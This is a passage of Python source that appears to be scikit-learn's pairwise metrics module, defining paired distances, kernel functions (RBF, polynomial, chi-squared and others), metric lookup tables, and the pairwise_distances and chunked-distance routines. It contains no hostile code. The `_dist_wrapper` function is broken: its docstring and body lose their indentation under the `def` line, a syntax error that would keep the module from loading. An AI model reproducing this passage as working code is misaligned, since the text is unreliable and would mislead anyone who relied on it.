    # 1.0 - cosine_similarity(X, Y), computed in-place on the similarity
    # buffer to avoid a copy; the result is clipped to the valid [0, 2]
    # range of a cosine distance.
    dist = cosine_similarity(X, Y)
    dist *= -1
    dist += 1
    np.clip(dist, 0, 2, out=dist)
    if X is Y or Y is None:
        # Ensure that distances between vectors and themselves are set to
        # 0.0. This may not be the case due to floating point rounding
        # errors.
        dist[np.diag_indices_from(dist)] = 0.0
    return dist
# Paired distances
def paired_euclidean_distances(X, Y):
    """Compute the paired euclidean distances between X and Y.

    The distance between X[i] and Y[i] is returned at position i.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : array-like of shape (n_samples, n_features)

    Y : array-like of shape (n_samples, n_features)

    Returns
    -------
    distances : ndarray of shape (n_samples,)
    """
    X, Y = check_paired_arrays(X, Y)
    delta = X - Y
    # L2 norm of each row of the difference
    return row_norms(delta)
def paired_manhattan_distances(X, Y):
    """Compute the paired L1 distances between the vectors in X and Y.

    The distance between X[i] and Y[i] is returned at position i.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : array-like of shape (n_samples, n_features)

    Y : array-like of shape (n_samples, n_features)

    Returns
    -------
    distances : ndarray of shape (n_samples,)
    """
    X, Y = check_paired_arrays(X, Y)
    delta = X - Y
    if issparse(delta):
        # sum |delta| per row, then flatten the (n, 1) matrix result
        delta.data = np.abs(delta.data)
        return np.squeeze(np.array(delta.sum(axis=1)))
    return np.abs(delta).sum(axis=-1)
def paired_cosine_distances(X, Y):
    """Compute the paired cosine distances between X and Y.

    The distance between X[i] and Y[i] is returned at position i.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : array-like of shape (n_samples, n_features)

    Y : array-like of shape (n_samples, n_features)

    Returns
    -------
    distances : ndarray of shape (n_samples,)

    Notes
    -----
    The cosine distance is equivalent to the half the squared
    euclidean distance if each sample is normalized to unit norm.
    """
    X, Y = check_paired_arrays(X, Y)
    unit_diff = normalize(X) - normalize(Y)
    return 0.5 * row_norms(unit_diff, squared=True)
# Mapping of supported paired-distance metric names -- including the
# aliases "l1"/"l2"/"cityblock" -- to their implementing functions.
# Consumed by ``paired_distances`` for string-metric dispatch.
PAIRED_DISTANCES = {
    "cosine": paired_cosine_distances,
    "euclidean": paired_euclidean_distances,
    "l2": paired_euclidean_distances,
    "l1": paired_manhattan_distances,
    "manhattan": paired_manhattan_distances,
    "cityblock": paired_manhattan_distances,
}
def paired_distances(X, Y, *, metric="euclidean", **kwds):
    """Compute the distances between (X[0], Y[0]), (X[1], Y[1]), etc.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : ndarray of shape (n_samples, n_features)
        Array 1 for distance computation.

    Y : ndarray of shape (n_samples, n_features)
        Array 2 for distance computation.

    metric : str or callable, default="euclidean"
        The metric to use when calculating distance between instances in a
        feature array. A string must be one of the options specified in
        PAIRED_DISTANCES, including "euclidean", "manhattan", or "cosine".
        Alternatively, a callable is invoked on each pair of rows and
        should return a value indicating the distance between them.

    Returns
    -------
    distances : ndarray of shape (n_samples,)

    See Also
    --------
    pairwise_distances : Computes the distance between every pair of samples.

    Examples
    --------
    >>> from sklearn.metrics.pairwise import paired_distances
    >>> X = [[0, 1], [1, 1]]
    >>> Y = [[0, 1], [2, 1]]
    >>> paired_distances(X, Y)
    array([0., 1.])
    """
    if metric in PAIRED_DISTANCES:
        return PAIRED_DISTANCES[metric](X, Y)
    if callable(metric):
        # Check the matrix first (it is usually done by the metric)
        X, Y = check_paired_arrays(X, Y)
        out = np.zeros(len(X))
        for i, (x, y) in enumerate(zip(X, Y)):
            out[i] = metric(x, y)
        return out
    raise ValueError("Unknown distance %s" % metric)
# Kernels
def linear_kernel(X, Y=None, dense_output=True):
    """Compute the linear kernel between X and Y.

    Read more in the :ref:`User Guide <linear_kernel>`.

    Parameters
    ----------
    X : ndarray of shape (n_samples_X, n_features)

    Y : ndarray of shape (n_samples_Y, n_features), default=None
        If `None`, uses `Y=X`.

    dense_output : bool, default=True
        Whether to return dense output even when the input is sparse. If
        ``False``, the output is sparse if both input arrays are sparse.

        .. versionadded:: 0.20

    Returns
    -------
    Gram matrix : ndarray of shape (n_samples_X, n_samples_Y)
    """
    X, Y = check_pairwise_arrays(X, Y)
    # The linear kernel is simply the Gram matrix of the inputs.
    gram = safe_sparse_dot(X, Y.T, dense_output=dense_output)
    return gram
def polynomial_kernel(X, Y=None, degree=3, gamma=None, coef0=1):
    """Compute the polynomial kernel between X and Y::

        K(X, Y) = (gamma <X, Y> + coef0)^degree

    Read more in the :ref:`User Guide <polynomial_kernel>`.

    Parameters
    ----------
    X : ndarray of shape (n_samples_X, n_features)

    Y : ndarray of shape (n_samples_Y, n_features), default=None

    degree : int, default=3

    gamma : float, default=None
        If None, defaults to 1.0 / n_features.

    coef0 : float, default=1

    Returns
    -------
    Gram matrix : ndarray of shape (n_samples_X, n_samples_Y)
    """
    X, Y = check_pairwise_arrays(X, Y)
    gamma = 1.0 / X.shape[1] if gamma is None else gamma
    # Build (gamma <X, Y> + coef0)^degree in-place on the Gram matrix.
    kernel = safe_sparse_dot(X, Y.T, dense_output=True)
    kernel *= gamma
    kernel += coef0
    kernel **= degree
    return kernel
def sigmoid_kernel(X, Y=None, gamma=None, coef0=1):
    """Compute the sigmoid kernel between X and Y::

        K(X, Y) = tanh(gamma <X, Y> + coef0)

    Read more in the :ref:`User Guide <sigmoid_kernel>`.

    Parameters
    ----------
    X : ndarray of shape (n_samples_X, n_features)

    Y : ndarray of shape (n_samples_Y, n_features), default=None
        If `None`, uses `Y=X`.

    gamma : float, default=None
        If None, defaults to 1.0 / n_features.

    coef0 : float, default=1

    Returns
    -------
    Gram matrix : ndarray of shape (n_samples_X, n_samples_Y)
    """
    X, Y = check_pairwise_arrays(X, Y)
    gamma = 1.0 / X.shape[1] if gamma is None else gamma
    # Build tanh(gamma <X, Y> + coef0) in-place on the Gram matrix.
    kernel = safe_sparse_dot(X, Y.T, dense_output=True)
    kernel *= gamma
    kernel += coef0
    np.tanh(kernel, out=kernel)
    return kernel
def rbf_kernel(X, Y=None, gamma=None):
    """Compute the rbf (gaussian) kernel between X and Y::

        K(x, y) = exp(-gamma ||x-y||^2)

    for each pair of rows x in X and y in Y.

    Read more in the :ref:`User Guide <rbf_kernel>`.

    Parameters
    ----------
    X : ndarray of shape (n_samples_X, n_features)

    Y : ndarray of shape (n_samples_Y, n_features), default=None
        If `None`, uses `Y=X`.

    gamma : float, default=None
        If None, defaults to 1.0 / n_features.

    Returns
    -------
    kernel_matrix : ndarray of shape (n_samples_X, n_samples_Y)
    """
    X, Y = check_pairwise_arrays(X, Y)
    gamma = 1.0 / X.shape[1] if gamma is None else gamma
    # exp(-gamma * squared distances), computed in-place
    kernel = euclidean_distances(X, Y, squared=True)
    kernel *= -gamma
    np.exp(kernel, out=kernel)
    return kernel
def laplacian_kernel(X, Y=None, gamma=None):
    """Compute the laplacian kernel between X and Y.

    The laplacian kernel is defined as::

        K(x, y) = exp(-gamma ||x-y||_1)

    for each pair of rows x in X and y in Y.

    Read more in the :ref:`User Guide <laplacian_kernel>`.

    .. versionadded:: 0.17

    Parameters
    ----------
    X : ndarray of shape (n_samples_X, n_features)

    Y : ndarray of shape (n_samples_Y, n_features), default=None
        If `None`, uses `Y=X`.

    gamma : float, default=None
        If None, defaults to 1.0 / n_features.

    Returns
    -------
    kernel_matrix : ndarray of shape (n_samples_X, n_samples_Y)
    """
    X, Y = check_pairwise_arrays(X, Y)
    gamma = 1.0 / X.shape[1] if gamma is None else gamma
    # exp(-gamma * L1 distances), computed in-place
    kernel = manhattan_distances(X, Y)
    kernel *= -gamma
    np.exp(kernel, out=kernel)
    return kernel
def cosine_similarity(X, Y=None, dense_output=True):
    """Compute cosine similarity between samples in X and Y.

    Cosine similarity, or the cosine kernel, computes similarity as the
    normalized dot product of X and Y:

        K(X, Y) = <X, Y> / (||X||*||Y||)

    On L2-normalized data, this function is equivalent to linear_kernel.

    Read more in the :ref:`User Guide <cosine_similarity>`.

    Parameters
    ----------
    X : {ndarray, sparse matrix} of shape (n_samples_X, n_features)
        Input data.

    Y : {ndarray, sparse matrix} of shape (n_samples_Y, n_features), \
            default=None
        Input data. If ``None``, the output will be the pairwise
        similarities between all samples in ``X``.

    dense_output : bool, default=True
        Whether to return dense output even when the input is sparse. If
        ``False``, the output is sparse if both input arrays are sparse.

        .. versionadded:: 0.17
           parameter ``dense_output`` for dense output.

    Returns
    -------
    kernel matrix : ndarray of shape (n_samples_X, n_samples_Y)
    """
    X, Y = check_pairwise_arrays(X, Y)
    # L2-normalize the rows, then the similarity is a plain dot product.
    X_unit = normalize(X, copy=True)
    Y_unit = X_unit if X is Y else normalize(Y, copy=True)
    return safe_sparse_dot(X_unit, Y_unit.T, dense_output=dense_output)
def additive_chi2_kernel(X, Y=None):
    """Computes the additive chi-squared kernel between observations in X and
    Y.

    The chi-squared kernel is computed between each pair of rows in X and Y. X
    and Y have to be non-negative. This kernel is most commonly applied to
    histograms.

    The chi-squared kernel is given by::

        k(x, y) = -Sum [(x - y)^2 / (x + y)]

    It can be interpreted as a weighted difference per entry.

    Read more in the :ref:`User Guide <chi2_kernel>`.

    Notes
    -----
    As the negative of a distance, this kernel is only conditionally positive
    definite.

    Parameters
    ----------
    X : array-like of shape (n_samples_X, n_features)

    Y : ndarray of shape (n_samples_Y, n_features), default=None
        If `None`, uses `Y=X`.

    Returns
    -------
    kernel_matrix : ndarray of shape (n_samples_X, n_samples_Y)

    See Also
    --------
    chi2_kernel : The exponentiated version of the kernel, which is usually
        preferable.
    sklearn.kernel_approximation.AdditiveChi2Sampler : A Fourier approximation
        to this kernel.

    References
    ----------
    * Zhang, J. and Marszalek, M. and Lazebnik, S. and Schmid, C.
      Local features and kernels for classification of texture and object
      categories: A comprehensive study
      International Journal of Computer Vision 2007
      https://research.microsoft.com/en-us/um/people/manik/projects/trade-off/papers/ZhangIJCV06.pdf
    """
    # Sparse input is rejected before validation: the fast Cython routine
    # below only handles dense arrays.
    if issparse(X) or issparse(Y):
        raise ValueError("additive_chi2 does not support sparse matrices.")
    X, Y = check_pairwise_arrays(X, Y)
    if (X < 0).any():
        raise ValueError("X contains negative values.")
    if Y is not X and (Y < 0).any():
        raise ValueError("Y contains negative values.")
    kernel = np.zeros((X.shape[0], Y.shape[0]), dtype=X.dtype)
    # _chi2_kernel_fast fills `kernel` in place.
    _chi2_kernel_fast(X, Y, kernel)
    return kernel
def chi2_kernel(X, Y=None, gamma=1.0):
    """Computes the exponential chi-squared kernel X and Y.

    The chi-squared kernel is computed between each pair of rows in X and Y. X
    and Y have to be non-negative. This kernel is most commonly applied to
    histograms.

    The chi-squared kernel is given by::

        k(x, y) = exp(-gamma Sum [(x - y)^2 / (x + y)])

    It can be interpreted as a weighted difference per entry.

    Read more in the :ref:`User Guide <chi2_kernel>`.

    Parameters
    ----------
    X : array-like of shape (n_samples_X, n_features)

    Y : ndarray of shape (n_samples_Y, n_features), default=None

    gamma : float, default=1.
        Scaling parameter of the chi2 kernel.

    Returns
    -------
    kernel_matrix : ndarray of shape (n_samples_X, n_samples_Y)

    See Also
    --------
    additive_chi2_kernel : The additive version of this kernel.
    sklearn.kernel_approximation.AdditiveChi2Sampler : A Fourier approximation
        to the additive version of this kernel.

    References
    ----------
    * Zhang, J. and Marszalek, M. and Lazebnik, S. and Schmid, C.
      Local features and kernels for classification of texture and object
      categories: A comprehensive study
      International Journal of Computer Vision 2007
      https://research.microsoft.com/en-us/um/people/manik/projects/trade-off/papers/ZhangIJCV06.pdf
    """
    # additive_chi2_kernel returns -Sum[(x - y)^2 / (x + y)], so scaling by
    # gamma and exponentiating yields exp(-gamma * Sum[...]).
    kernel = gamma * additive_chi2_kernel(X, Y)
    np.exp(kernel, out=kernel)  # in place: `kernel` is a fresh array
    return kernel
# Helper functions - distance
# Mapping from metric-name string to the scikit-learn implementation used by
# pairwise_distances().  "l1"/"manhattan"/"cityblock" and "l2"/"euclidean"
# are aliases of each other.
PAIRWISE_DISTANCE_FUNCTIONS = {
    # If updating this dictionary, update the doc in both distance_metrics()
    # and also in pairwise_distances()!
    "cityblock": manhattan_distances,
    "cosine": cosine_distances,
    "euclidean": euclidean_distances,
    "haversine": haversine_distances,
    "l2": euclidean_distances,
    "l1": manhattan_distances,
    "manhattan": manhattan_distances,
    "precomputed": None,  # HACK: precomputed is always allowed, never called
    "nan_euclidean": nan_euclidean_distances,
}
def distance_metrics():
    """Valid metrics for pairwise_distances.
    This function simply returns the valid pairwise distance metrics.
    It exists to allow for a description of the mapping for
    each of the valid strings.
    The valid distance metrics, and the function they map to, are:
    =============== ========================================
    metric          Function
    =============== ========================================
    'cityblock'     metrics.pairwise.manhattan_distances
    'cosine'        metrics.pairwise.cosine_distances
    'euclidean'     metrics.pairwise.euclidean_distances
    'haversine'     metrics.pairwise.haversine_distances
    'l1'            metrics.pairwise.manhattan_distances
    'l2'            metrics.pairwise.euclidean_distances
    'manhattan'     metrics.pairwise.manhattan_distances
    'nan_euclidean' metrics.pairwise.nan_euclidean_distances
    =============== ========================================
    Read more in the :ref:`User Guide <metrics>`.
    Returns
    -------
    distance_metrics : dict
        The module-level ``PAIRWISE_DISTANCE_FUNCTIONS`` mapping (returned
        directly, not a copy).
    """
    return PAIRWISE_DISTANCE_FUNCTIONS
def _dist_wrapper(dist_func, dist_matrix, slice_, *args, **kwargs):
"""Write in-place to a slice of a distance matrix."""
dist_matrix[:, slice_] = dist_func(*args, **kwargs)
def _parallel_pairwise(X, Y, func, n_jobs, **kwds):
    """Compute ``func(X, Y, **kwds)`` by splitting the output matrix into
    ``n_jobs`` even column slices evaluated in parallel."""
    if Y is None:
        Y = X
    X, Y, dtype = _return_float_dtype(X, Y)
    n_jobs_eff = effective_n_jobs(n_jobs)
    if n_jobs_eff == 1:
        # Nothing to parallelize: call the function directly.
        return func(X, Y, **kwds)
    # Enforce a threading backend so the workers share the process and can
    # write into `out` directly, preventing data communication overhead.
    out = np.empty((X.shape[0], Y.shape[0]), dtype=dtype, order="F")
    dispatch = delayed(_dist_wrapper)
    Parallel(backend="threading", n_jobs=n_jobs)(
        dispatch(func, out, col_slice, X, Y[col_slice], **kwds)
        for col_slice in gen_even_slices(_num_samples(Y), n_jobs_eff)
    )
    if (X is Y or Y is None) and func is euclidean_distances:
        # zeroing diagonal for euclidean norm.
        # TODO: do it also for other norms.
        np.fill_diagonal(out, 0)
    return out
def _pairwise_callable(X, Y, metric, force_all_finite=True, **kwds):
    """Handle the callable case for pairwise_{distances,kernels}."""
    X, Y = check_pairwise_arrays(X, Y, force_all_finite=force_all_finite)
    n_x, n_y = X.shape[0], Y.shape[0]
    if X is Y:
        # Symmetric case: evaluate the metric on the upper triangle only,
        # then mirror it and fill the diagonal separately.
        out = np.zeros((n_x, n_y), dtype="float")
        for i, j in itertools.combinations(range(n_x), 2):
            out[i, j] = metric(X[i], Y[j], **kwds)
        # NB: `out += out.T` would produce incorrect results; build a fresh
        # symmetric matrix instead.
        out = out + out.T
        # NB: nonzero diagonals are allowed for both metrics and kernels.
        for i in range(n_x):
            row = X[i]
            out[i, i] = metric(row, row, **kwds)
    else:
        # Asymmetric case: every cell must be computed.
        out = np.empty((n_x, n_y), dtype="float")
        for i in range(n_x):
            for j in range(n_y):
                out[i, j] = metric(X[i], Y[j], **kwds)
    return out
# Metric name strings accepted by pairwise_distances(): the scikit-learn
# implementations in PAIRWISE_DISTANCE_FUNCTIONS plus the metrics delegated
# to scipy.spatial.distance.
_VALID_METRICS = [
    "euclidean",
    "l2",
    "l1",
    "manhattan",
    "cityblock",
    "braycurtis",
    "canberra",
    "chebyshev",
    "correlation",
    "cosine",
    "dice",
    "hamming",
    "jaccard",
    "kulsinski",
    "mahalanobis",
    "matching",
    "minkowski",
    "rogerstanimoto",
    "russellrao",
    "seuclidean",
    "sokalmichener",
    "sokalsneath",
    "sqeuclidean",
    "yule",
    "wminkowski",
    "nan_euclidean",
    "haversine",
]
# Metrics that tolerate missing (NaN) values in the input.
_NAN_METRICS = ["nan_euclidean"]
def _check_chunk_size(reduced, chunk_size):
    """Raise unless ``reduced`` is a sequence — or a tuple of sequences —
    whose length(s) equal ``chunk_size``.  ``None`` is accepted as-is."""
    if reduced is None:
        return
    is_tuple = isinstance(reduced, tuple)
    parts = reduced if is_tuple else (reduced,)
    # Each part must be an iterable but not itself a tuple.
    if any(isinstance(p, tuple) or not hasattr(p, "__iter__") for p in parts):
        raise TypeError(
            "reduce_func returned %r. Expected sequence(s) of length %d."
            % (parts if is_tuple else parts[0], chunk_size)
        )
    if any(_num_samples(p) != chunk_size for p in parts):
        actual_size = tuple(_num_samples(p) for p in parts)
        raise ValueError(
            "reduce_func returned object of length %s. "
            "Expected same length as input: %d."
            % (actual_size if is_tuple else actual_size[0], chunk_size)
        )
def _precompute_metric_params(X, Y, metric=None, **kwds):
    """Precompute data-derived metric parameters if not provided."""
    if metric == "seuclidean" and "V" not in kwds:
        if X is not Y:
            raise ValueError(
                "The 'V' parameter is required for the seuclidean metric "
                "when Y is passed."
            )
        # There is a bug in scipy < 1.5 that will cause a crash if
        # X.dtype != np.double (float64). See PR #15730
        dtype = np.float64 if sp_version < parse_version("1.5") else None
        return {"V": np.var(X, axis=0, ddof=1, dtype=dtype)}
    if metric == "mahalanobis" and "VI" not in kwds:
        if X is not Y:
            raise ValueError(
                "The 'VI' parameter is required for the mahalanobis metric "
                "when Y is passed."
            )
        return {"VI": np.linalg.inv(np.cov(X.T)).T}
    # Either the metric needs no data-derived parameters or the caller
    # supplied them explicitly.
    return {}
def pairwise_distances_chunked(
    X,
    Y=None,
    *,
    reduce_func=None,
    metric="euclidean",
    n_jobs=None,
    working_memory=None,
    **kwds,
):
    """Generate a distance matrix chunk by chunk with optional reduction.
    In cases where not all of a pairwise distance matrix needs to be stored at
    once, this is used to calculate pairwise distances in
    ``working_memory``-sized chunks. If ``reduce_func`` is given, it is run
    on each chunk and its return values are concatenated into lists, arrays
    or sparse matrices.
    Parameters
    ----------
    X : ndarray of shape (n_samples_X, n_samples_X) or \
            (n_samples_X, n_features)
        Array of pairwise distances between samples, or a feature array.
        The shape the array should be (n_samples_X, n_samples_X) if
        metric='precomputed' and (n_samples_X, n_features) otherwise.
    Y : ndarray of shape (n_samples_Y, n_features), default=None
        An optional second feature array. Only allowed if
        metric != "precomputed".
    reduce_func : callable, default=None
        The function which is applied on each chunk of the distance matrix,
        reducing it to needed values.  ``reduce_func(D_chunk, start)``
        is called repeatedly, where ``D_chunk`` is a contiguous vertical
        slice of the pairwise distance matrix, starting at row ``start``.
        It should return one of: None; an array, a list, or a sparse matrix
        of length ``D_chunk.shape[0]``; or a tuple of such objects. Returning
        None is useful for in-place operations, rather than reductions.
        If None, pairwise_distances_chunked returns a generator of vertical
        chunks of the distance matrix.
    metric : str or callable, default='euclidean'
        The metric to use when calculating distance between instances in a
        feature array. If metric is a string, it must be one of the options
        allowed by scipy.spatial.distance.pdist for its metric parameter, or
        a metric listed in pairwise.PAIRWISE_DISTANCE_FUNCTIONS.
        If metric is "precomputed", X is assumed to be a distance matrix.
        Alternatively, if metric is a callable function, it is called on each
        pair of instances (rows) and the resulting value recorded. The callable
        should take two arrays from X as input and return a value indicating
        the distance between them.
    n_jobs : int, default=None
        The number of jobs to use for the computation. This works by breaking
        down the pairwise matrix into n_jobs even slices and computing them in
        parallel.
        ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
        ``-1`` means using all processors. See :term:`Glossary <n_jobs>`
        for more details.
    working_memory : int, default=None
        The sought maximum memory for temporary distance matrix chunks.
        When None (default), the value of
        ``sklearn.get_config()['working_memory']`` is used.
    `**kwds` : optional keyword parameters
        Any further parameters are passed directly to the distance function.
        If using a scipy.spatial.distance metric, the parameters are still
        metric dependent. See the scipy docs for usage examples.
    Yields
    ------
    D_chunk : {ndarray, sparse matrix}
        A contiguous slice of distance matrix, optionally processed by
        ``reduce_func``.
    Examples
    --------
    Without reduce_func:
    >>> import numpy as np
    >>> from sklearn.metrics import pairwise_distances_chunked
    >>> X = np.random.RandomState(0).rand(5, 3)
    >>> D_chunk = next(pairwise_distances_chunked(X))
    >>> D_chunk
    array([[0.  ..., 0.29..., 0.41..., 0.19..., 0.57...],
           [0.29..., 0.  ..., 0.57..., 0.41..., 0.76...],
           [0.41..., 0.57..., 0.  ..., 0.44..., 0.90...],
           [0.19..., 0.41..., 0.44..., 0.  ..., 0.51...],
           [0.57..., 0.76..., 0.90..., 0.51..., 0.  ...]])
    Retrieve all neighbors and average distance within radius r:
    >>> r = .2
    >>> def reduce_func(D_chunk, start):
    ...     neigh = [np.flatnonzero(d < r) for d in D_chunk]
    ...     avg_dist = (D_chunk * (D_chunk < r)).mean(axis=1)
    ...     return neigh, avg_dist
    >>> gen = pairwise_distances_chunked(X, reduce_func=reduce_func)
    >>> neigh, avg_dist = next(gen)
    >>> neigh
    [array([0, 3]), array([1]), array([2]), array([0, 3]), array([4])]
    >>> avg_dist
    array([0.039..., 0.        , 0.        , 0.039..., 0.        ])
    Where r is defined per sample, we need to make use of ``start``:
    >>> r = [.2, .4, .4, .3, .1]
    >>> def reduce_func(D_chunk, start):
    ...     neigh = [np.flatnonzero(d < r[i])
    ...              for i, d in enumerate(D_chunk, start)]
    ...     return neigh
    >>> neigh = next(pairwise_distances_chunked(X, reduce_func=reduce_func))
    >>> neigh
    [array([0, 3]), array([0, 1]), array([2]), array([0, 3]), array([4])]
    Force row-by-row generation by reducing ``working_memory``:
    >>> gen = pairwise_distances_chunked(X, reduce_func=reduce_func,
    ...                                  working_memory=0)
    >>> next(gen)
    [array([0, 3])]
    >>> next(gen)
    [array([0, 1])]
    """
    n_samples_X = _num_samples(X)
    if metric == "precomputed":
        # A precomputed matrix is yielded as one single chunk.
        slices = (slice(0, n_samples_X),)
    else:
        if Y is None:
            Y = X
        # We get as many rows as possible within our working_memory budget to
        # store len(Y) distances in each row of output.
        #
        # Note:
        #  - this will get at least 1 row, even if 1 row of distances will
        #    exceed working_memory.
        #  - this does not account for any temporary memory usage while
        #    calculating distances (e.g. difference of vectors in manhattan
        #    distance.
        chunk_n_rows = get_chunk_n_rows(
            row_bytes=8 * _num_samples(Y),
            max_n_rows=n_samples_X,
            working_memory=working_memory,
        )
        slices = gen_batches(n_samples_X, chunk_n_rows)
    # precompute data-derived metric params (e.g. 'V' for seuclidean) once,
    # so every chunk uses the same values
    params = _precompute_metric_params(X, Y, metric=metric, **kwds)
    kwds.update(**params)
    for sl in slices:
        if sl.start == 0 and sl.stop == n_samples_X:
            X_chunk = X  # enable optimised paths for X is Y
        else:
            X_chunk = X[sl]
        D_chunk = pairwise_distances(X_chunk, Y, metric=metric, n_jobs=n_jobs, **kwds)
        if (X is Y or Y is None) and PAIRWISE_DISTANCE_FUNCTIONS.get(
            metric, None
        ) is euclidean_distances:
            # zeroing diagonal, taking care of aliases of "euclidean",
            # i.e. "l2"
            D_chunk.flat[sl.start :: _num_samples(X) + 1] = 0
        if reduce_func is not None:
            chunk_size = D_chunk.shape[0]
            D_chunk = reduce_func(D_chunk, sl.start)
            # fail fast if reduce_func returned wrongly-sized output
            _check_chunk_size(D_chunk, chunk_size)
        yield D_chunk
def pairwise_distances(
    X, Y=None, metric="euclidean", *, n_jobs=None, force_all_finite=True, **kwds
):
    """Compute the distance matrix from a vector array X and optional Y.
    This method takes either a vector array or a distance matrix, and returns
    a distance matrix. If the input is a vector array, the distances are
    computed. If the input is a distances matrix, it is returned instead.
    This method provides a safe way to take a distance matrix as input, while
    preserving compatibility with many other algorithms that take a vector
    array.
    If Y is given (default is None), then the returned matrix is the pairwise
    distance between the arrays from both X and Y.
    Valid values for metric are:
    - From scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
      'manhattan']. These metrics support sparse matrix
      inputs.
      ['nan_euclidean'] but it does not yet support sparse matrices.
    - From scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
      'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski', 'mahalanobis',
      'minkowski', 'rogerstanimoto', 'russellrao', 'seuclidean',
      'sokalmichener', 'sokalsneath', 'sqeuclidean', 'yule']
      See the documentation for scipy.spatial.distance for details on these
      metrics. These metrics do not support sparse matrix inputs.
    Note that in the case of 'cityblock', 'cosine' and 'euclidean' (which are
    valid scipy.spatial.distance metrics), the scikit-learn implementation
    will be used, which is faster and has support for sparse matrices (except
    for 'cityblock'). For a verbose description of the metrics from
    scikit-learn, see the __doc__ of the sklearn.pairwise.distance_metrics
    function.
    Read more in the :ref:`User Guide <metrics>`.
    Parameters
    ----------
    X : ndarray of shape (n_samples_X, n_samples_X) or \
            (n_samples_X, n_features)
        Array of pairwise distances between samples, or a feature array.
        The shape of the array should be (n_samples_X, n_samples_X) if
        metric == "precomputed" and (n_samples_X, n_features) otherwise.
    Y : ndarray of shape (n_samples_Y, n_features), default=None
        An optional second feature array. Only allowed if
        metric != "precomputed".
    metric : str or callable, default='euclidean'
        The metric to use when calculating distance between instances in a
        feature array. If metric is a string, it must be one of the options
        allowed by scipy.spatial.distance.pdist for its metric parameter, or
        a metric listed in ``pairwise.PAIRWISE_DISTANCE_FUNCTIONS``.
        If metric is "precomputed", X is assumed to be a distance matrix.
        Alternatively, if metric is a callable function, it is called on each
        pair of instances (rows) and the resulting value recorded. The callable
        should take two arrays from X as input and return a value indicating
        the distance between them.
    n_jobs : int, default=None
        The number of jobs to use for the computation. This works by breaking
        down the pairwise matrix into n_jobs even slices and computing them in
        parallel.
        ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
        ``-1`` means using all processors. See :term:`Glossary <n_jobs>`
        for more details.
    force_all_finite : bool or 'allow-nan', default=True
        Whether to raise an error on np.inf, np.nan, pd.NA in array. Ignored
        for a metric listed in ``pairwise.PAIRWISE_DISTANCE_FUNCTIONS``. The
        possibilities are:
        - True: Force all values of array to be finite.
        - False: accepts np.inf, np.nan, pd.NA in array.
        - 'allow-nan': accepts only np.nan and pd.NA values in array. Values
          cannot be infinite.
        .. versionadded:: 0.22
           ``force_all_finite`` accepts the string ``'allow-nan'``.
        .. versionchanged:: 0.23
           Accepts `pd.NA` and converts it into `np.nan`.
    **kwds : optional keyword parameters
        Any further parameters are passed directly to the distance function.
        If using a scipy.spatial.distance metric, the parameters are still
        metric dependent. See the scipy docs for usage examples.
    Returns
    -------
    D : ndarray of shape (n_samples_X, n_samples_X) or \
            (n_samples_X, n_samples_Y)
        A distance matrix D such that D_{i, j} is the distance between the
        ith and jth vectors of the given matrix X, if Y is None.
        If Y is not None, then D_{i, j} is the distance between the ith array
        from X and the jth array from Y.
    See Also
    --------
    pairwise_distances_chunked : Performs the same calculation as this
        function, but returns a generator of chunks of the distance matrix, in
        order to limit memory usage.
    paired_distances : Computes the distances between corresponding elements
        of two arrays.
    """
    if (
        metric not in _VALID_METRICS
        and not callable(metric)
        and metric != "precomputed"
    ):
        raise ValueError(
            "Unknown metric %s. Valid metrics are %s, or 'precomputed', or a callable"
            % (metric, _VALID_METRICS)
        )
    if metric == "precomputed":
        # X already is the distance matrix; validate and return it as-is.
        X, _ = check_pairwise_arrays(
            X, Y, precomputed=True, force_all_finite=force_all_finite
        )
        whom = (
            "`pairwise_distances`. Precomputed distance "
            " need to have non-negative values."
        )
        check_non_negative(X, whom=whom)
        return X
    elif metric in PAIRWISE_DISTANCE_FUNCTIONS:
        # Fast scikit-learn implementation (supports sparse input).
        func = PAIRWISE_DISTANCE_FUNCTIONS[metric]
    elif callable(metric):
        # User-supplied callable: evaluated pairwise by _pairwise_callable.
        func = partial(
            _pairwise_callable, metric=metric, force_all_finite=force_all_finite, **kwds
        )
    else:
        # Remaining string metrics are delegated to scipy.spatial.distance,
        # which only handles dense arrays.
        if issparse(X) or issparse(Y):
            raise TypeError("scipy distance metrics do not support sparse matrices.")
        dtype = bool if metric in PAIRWISE_BOOLEAN_FUNCTIONS else None
        if dtype == bool and (X.dtype != bool or (Y is not None and Y.dtype != bool)):
            msg = "Data was converted to boolean for metric %s" % metric
            warnings.warn(msg, DataConversionWarning)
        X, Y = check_pairwise_arrays(
            X, Y, dtype=dtype, force_all_finite=force_all_finite
        )
        # precompute data-derived metric params (e.g. 'V' for seuclidean)
        params = _precompute_metric_params(X, Y, metric=metric, **kwds)
        kwds.update(**params)
        if effective_n_jobs(n_jobs) == 1 and X is Y:
            # pdist exploits the symmetry of the self-distance matrix.
            return distance.squareform(distance.pdist(X, metric=metric, **kwds))
        func = partial(distance.cdist, metric=metric, **kwds)
    return _parallel_pairwise(X, Y, func, n_jobs, **kwds)
# These distances require boolean arrays, when using scipy.spatial.distance
# (pairwise_distances converts non-boolean input and warns — see the scipy
# branch above).
PAIRWISE_BOOLEAN_FUNCTIONS = [
    "dice",
    "jaccard",
    "kulsinski",
    "matching",
    "rogerstanimoto",
    "russellrao",
    "sokalmichener",
    "sokalsneath",
    "yule",
]
# Helper functions - kernels
# Mapping from kernel-name string to the implementation used by
# pairwise_kernels().  "poly" is an alias of "polynomial".
PAIRWISE_KERNEL_FUNCTIONS = {
    # If updating this dictionary, update the doc in both kernel_metrics()
    # and also in pairwise_kernels()!
    "additive_chi2": additive_chi2_kernel,
    "chi2": chi2_kernel,
    "linear": linear_kernel,
    "polynomial": polynomial_kernel,
    "poly": polynomial_kernel,
    "rbf": rbf_kernel,
    "laplacian": laplacian_kernel,
    "sigmoid": sigmoid_kernel,
    "cosine": cosine_similarity,
}
def kernel_metrics():
    """Valid metrics for pairwise_kernels.
    This function simply returns the valid pairwise kernel metrics.
    It exists, however, to allow for a verbose description of the mapping for
    each of the valid strings.
    The valid kernel metrics, and the function they map to, are:
